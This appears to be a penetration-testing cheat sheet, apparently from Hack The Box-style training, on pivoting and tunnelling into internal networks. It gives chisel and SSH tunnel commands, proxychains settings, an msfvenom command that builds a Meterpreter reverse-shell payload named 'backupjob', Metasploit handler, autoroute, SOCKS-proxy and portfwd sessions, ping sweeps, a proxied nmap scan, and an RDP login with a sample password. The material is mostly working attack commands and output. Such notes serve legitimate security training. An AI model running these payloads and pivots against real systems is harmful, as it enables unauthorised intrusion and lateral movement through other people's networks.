Chisel Socks5
Victim
Copy . / chisel server - v - p 1234 -- socks5 Attacker
Copy . / chisel client - v 10.129 . 202.64 : 1234 socks proxychains.conf
Copy MuhammadZubair@htb[ / htb]$ tail - f / etc / proxychains .conf
#
# proxy types : http , socks4 , socks5
# ( auth types supported: "basic" - http "user/pass" - socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4 127.0 . 0.1 9050
socks5 127.0 . 0.1 1080 Reverse
Copy # Attacker
sudo . / chisel server -- reverse - v - p 1234 -- socks5
Copy # Victim
. / chisel client - v 10.10 . 14.17 : 1234 R : socks proxychains
Copy MuhammadZubair@htb[ / htb]$ tail - f / etc / proxychains .conf
[ProxyList]
# add proxy here ...
# socks4 127.0 . 0.1 9050
socks5 127.0 . 0.1 1080
💡 Note: If you are getting an error message with chisel on the target, try with a different version.
Local Port Forward
Copy ssh - L 1234 :localhost : 3306 ubuntu@ 10.129 . 202.64 Forwarding Multiple Ports
Copy ssh - L 1234 :localhost : 3306 - L 8080 :localhost : 80 ubuntu@ 10.129 . 202.64 Dynamic Port Forwarding
Copy ssh - D 9050 ubuntu@ 10.129 . 202.64 proxychains
Copy MuhammadZubair@htb[ / htb]$ tail - 4 / etc / proxychains .conf
# meanwile
# defaults set to "tor"
socks4 127.0 . 0.1 9050 For More Please visit here .
Meterpreter Tunneling & Port Forwarding
Copy msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= 10.10.14.18 -f elf -o backupjob LPORT= 8080
Copy msf6 > use exploit/multi/handler
[ * ] Using configured payload generic/shell_reverse_tcp
msf6 exploit ( multi/handler ) > set lhost 0.0.0.0
lhost = > 0.0.0.0
msf6 exploit ( multi/handler ) > set lport 8080
lport = > 8080
msf6 exploit ( multi/handler ) > set payload linux/x64/meterpreter/reverse_tcp
payload = > linux/x64/meterpreter/reverse_tcp
msf6 exploit ( multi/handler ) > run
[ * ] Started reverse TCP handler on 0.0.0.0:8080 Ping Sweep
Copy meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
[ * ] Performing ping sweep for IP range 172.16.5.0/23 Ping Sweep For Loop on Linux Pivot Hosts
Copy for i in { 1..254} ; do ( ping -c 1 172.16.5. $i | grep "bytes from" & ) ;done Ping Sweep For Loop Using CMD
Copy for /L %i in ( 1 1 254 ) do ping 172.16.5.%i -n 1 -w 100 | find "Reply" Ping Sweep Using PowerShell
Copy 1..254 | % { "172.16.5.$($_): $( Test-Connection -count 1 -comp 172.15.5. $($_) -quiet )" } Configuring MSF's SOCKS Proxy
Copy msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary ( server/socks_proxy ) > set SRVPORT 9050
SRVPORT = > 9050
msf6 auxiliary ( server/socks_proxy ) > set SRVHOST 0.0.0.0
SRVHOST = > 0.0.0.0
msf6 auxiliary ( server/socks_proxy ) > set version 4a
version = > 4a
msf6 auxiliary ( server/socks_proxy ) > run
[ * ] Auxiliary module running as background job 0.
[ * ] Starting the SOCKS proxy server
msf6 auxiliary ( server/socks_proxy ) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 9050 yes The port to listen on
VERSION 4a yes The SOCKS version to use (Accepted: 4a,
5 )
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server Confirming Proxy Server is Running
Copy msf6 auxiliary ( server/socks_proxy ) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Auxiliary: server/socks_proxy Adding a Line to proxychains.conf if Needed
Copy socks4 127.0.0.1 9050 Creating Routes with AutoRoute
Copy msf6 > use post/multi/manage/autoroute
msf6 post ( multi/manage/autoroute ) > set SESSION 1
SESSION = > 1
msf6 post ( multi/manage/autoroute ) > set SUBNET 172.16.5.0
SUBNET = > 172.16.5.0
msf6 post ( multi/manage/autoroute ) > run
[ ! ] SESSION may not be compatible with this module:
[ ! ] * incompatible session platform: linux
[ * ] Running module against 10.129.202.64
[ * ] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host 's routing table.
[+] Route added to subnet 172.16.5.0/255.255.254.0 from host' s routing table.
[ * ] Post module execution completed It is also possible to add routes with autoroute by running autoroute from the Meterpreter session.
Copy meterpreter > run autoroute -s 172.16.5.0/23
[ ! ] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[ ! ] Example: run post/multi/manage/autoroute OPTION = value [...]
[ * ] Adding a route to 172.16.5.0/255.255.254.0...
[+] Added route to 172.16.5.0/255.255.254.0 via 10.129.202.64
[ * ] Use the -p option to list all active routes Listing Active Routes with AutoRoute
Copy meterpreter > run autoroute -p
[ ! ] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[ ! ] Example: run post/multi/manage/autoroute OPTION = value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.129.0.0 255.255.0.0 Session 1
172.16.4.0 255.255.254.0 Session 1
172.16.5.0 255.255.254.0 Session 1 Testing Proxy & Routing Functionality
Copy proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn
ProxyChains-3.1 (http://proxychains.sf.net)
Initiating Connect Scan at 13:40
Scanning 172.16.5.19 [1 port]
| S-chain | - <>-127.0.0.1:9050-<><>-172.16.5.19 :3389- <><> -OK
Completed Connect Scan at 13:40, 0.12s elapsed (1 total ports )
Nmap scan report for 172.16.5.19
Host is up (0.12s latency ).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up ) scanned in 0.45 seconds Port Forwarding
Copy meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
[ * ] Local TCP relay created: :3300 < - > 172.16.5.19:3389 Connecting to Windows Target through localhost
Copy xfreerdp /v:localhost:3300 /u:victor /p:pass@123
Copy $ netstat -antp
tcp 0 0 127.0.0.1:54652 127.0.0.1:3300 ESTABLISHED 4075/xfreerdp Meterpreter Reverse Port Forwarding
Read More .
Sshuttle
Copy sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v Last updated 9 months ago
